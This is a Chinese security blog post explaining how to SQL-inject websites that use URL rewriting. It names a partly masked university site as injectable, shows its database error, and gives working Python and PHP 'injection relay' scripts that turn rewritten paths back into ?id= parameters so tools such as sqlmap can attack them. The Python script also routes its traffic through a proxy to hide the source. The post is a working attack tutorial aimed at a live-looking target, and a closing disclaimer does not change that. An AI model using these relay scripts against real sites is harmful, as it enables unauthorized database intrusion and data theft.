python脚本处理伪静态注入

2019年5月6日13:42:01评论263 views字数 1987阅读6分37秒阅读模式

摘要

目前有很多网站做了rewrite.通常情况下，动态脚本的网站的url类似下面这样 http://www.xxoo.net/aa.php?id=123 做了伪静态之后类似这样 http://www.xxoo.net/aa.php/id/123.html 总归大趋势下，攻击的门槛逐渐增高。这样有利有弊，喜欢研究的会深入钻研，另一方面只会用工具不懂原理的则充斥到大小论坛水区。实战举例：

目前有很多网站做了rewrite.

/?id=1  /1  /1111.php

通常情况下，动态脚本的网站的url类似下面这样 http://www.xxoo.net/aa.php?id=123 做了伪静态之后类似这样 http://www.xxoo.net/aa.php/id/123.html 总归大趋势下，攻击的门槛逐渐增高。这样有利有弊，喜欢研究的会深入钻研，另一方面只会用工具不懂原理的则充斥到大小论坛水区。实战举例：

http://www.bxxxxxxxxxxxx.edu/magazine/index.php/mxxxxia/gallery/dickinsons-last-dance/1

这个点存在注入

Error Number: 1064  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1dddddd, 1' at line 4

标准的显错注入。这里测试了几个工具havijhttp://www.bxxxxxxxxxxxx.edu/magazine/index.php/mxxxxia/gallery/dickinsons-last-dance/1sqlmap safe3 穿山甲此上都无法直接注入。这里借助注入中转实现：中转工具有一些 win7下会遭遇各种奇葩问题。并linux下不能使用。用python code了一篇，为什么用python 因为他开发快，不用各种环境。

from BaseHTTPServer import *   import urllib2   class MyHTTPHandler(BaseHTTPRequestHandler):   def do_GET(self):   path=self.path   path=path[path.find('id=')+3:]   proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"})   opener = urllib2.build/_opener(proxy/_support)   urllib2.install_opener(opener)   url="http://www.xxxxxxxxxxxxx.edu/magazine/imedia/gallery/dickinsons-last-dance/"   try:   response=urllib2.urlopen(url+path)   html=response.read()   except urllib2.URLError,e:   html=e.read()   self.wfile.write(html)   server = HTTPServer(("", 8000), MyHTTPHandler)   server.serve_forever()

不到20行代码（并加入了 goagent代理for hidden ）。已经实现了要求。http://127.0.0.1:8000/?id=1从而达到目的。相比构造自己脚本去执行sql注入语句，要高效的多。

给习惯用php的朋友添加一个php脚本的中转注入：可以自定义需要的头信息，在需要cookie或者refer等位置都可以方便的添加，添加好后直接访问zhongzhuan.php?id=1然后就可以放到工具中注入了，十分方便

<?php set_time_limit(0);  $id=$_GET["id"];  $id=str_replace(" ","%20",$id);  $id=str_replace("=","%3D",$id);  $cookie="test"; $url = "http://www.qq.com/index.php/id/{$id}.html";  //$postdata = "";  $ch = curl_init();  curl_setopt($ch, CURLOPT_URL, "$url");  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  curl_setopt($ch, CURLOPT_COOKIE, "$cookie"); // curl_setopt($ch, CURLOPT_POST, 1);//post提交方式 // curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);//post的数据 $output = curl_exec($ch);  curl_close($ch);  print_r($output); ?>

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

python脚本处理伪静态注入

内网渗透—Kerberos认证

SRC挖掘思路（一）

SpringCloud Gateway spel RCE(CVE-2022-22947) | 附检测脚本

攻防最前线：利用侧信道攻击破解同态加密

Linux提权（七）Linux Polkit提权

CVE-2021-30632 V8引擎漏洞分析

Clash for Windows远程代码执行漏洞复现

Linux提权-PATH环境变量提权环境部署和提权方法

实战|对某一网站的渗透测试

发表评论

在线咨询

微信